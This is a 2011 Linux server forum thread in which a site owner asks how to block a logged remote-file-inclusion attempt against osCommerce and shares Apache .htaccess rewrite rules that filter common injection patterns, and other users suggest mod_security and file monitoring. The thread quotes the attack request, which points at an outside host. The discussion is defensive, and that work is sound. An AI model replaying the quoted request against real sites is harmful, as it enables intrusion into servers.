LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Server (https://www.linuxquestions.org/questions/linux-server-73/)
-   -   How to Block attacks "http://213.246.61.125:2082/index.html?" and similar. (https://www.linuxquestions.org/questions/linux-server-73/how-to-block-attacks-http-213-246-61-125-2082-index-html-and-similar-857243/)

angel115 01-19-2011 06:21 AM
How to Block attacks "http://213.246.61.125:2082/index.html?" and similar.
 
Hello there,

Today I've found several attempt to access the following url on my website:
/index.php?file-download=http://213.246.61.125:2082/index.html?

After googleing a bit it seems that in some cases, using this attack, the bag guy is able to change the code in some of your files.

it also seems to affect only a certain version of oScommerce.

I don't use oScommerce, so I do believe that I'm on the safe side, but it's not the first time that I see some similar attempt of attack on my website.

So to protect my self I was wondering if using .htaccess restriction would be enough?

At the moment I'm using the following: (that I've found on an other forum)
Code:
########## Begin - Rewrite rules to block out some common exploits
#
RewriteEngine on
Options +FollowSymLinks
#
# Block out any script trying to base64_encode
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Block hackers trying a redirect via cPath
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC]
#Block attempt to redirect to /self
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC]
#
RewriteRule ^.* - [F]
#
########## End - Rewrite rules to block out some common exploits
But I do think that these rewrite string are more specificity write to protect oScommerce site.

Any advice on how to protect my web site from such attach and similar?

Best regards,
Angel.

GlennsPref 01-19-2011 06:51 AM
Hi, it's very easy to get concerned with possible breaches in you web security.

But warnings and errors in your logs are just that, warnings and errors.

If anything is done you will get "failed" messages.

look again and see if that is you problem.

Regards Glenn

Hangdog42 01-19-2011 07:49 AM
In addition to what Glenn suggested, you might want to consider some pre-emptive moves. Something like mod_security might not be a bad idea, and you might want to consider some active file monitoring like Aide or Samhain. However, for those to really be useful, you need to trust your current installation completely.

angel115 01-19-2011 08:37 AM
Thanks to you both.

I'll follow your recommandation.

PS Hangdog42: I have to check, but I think I already enable "mod_security"

Thanks,
Angel.

angel115 01-19-2011 12:28 PM
I've found a fairly good resource on symantec web site on how to use .htaccess in an efficient way:
http://www.symantec.com/connect/arti...ccess-part-one

GlennsPref 01-19-2011 02:19 PM
Hi, just another thought, I used tutes similar to and including this Magazine article to get my system ironed out.

Keeping Your Linux System Secure
ref. http://www.linux.org/lessons/advanced/x313.html

Cheers and all the best, Glenn


All times are GMT -5. The time now is 12:29 AM.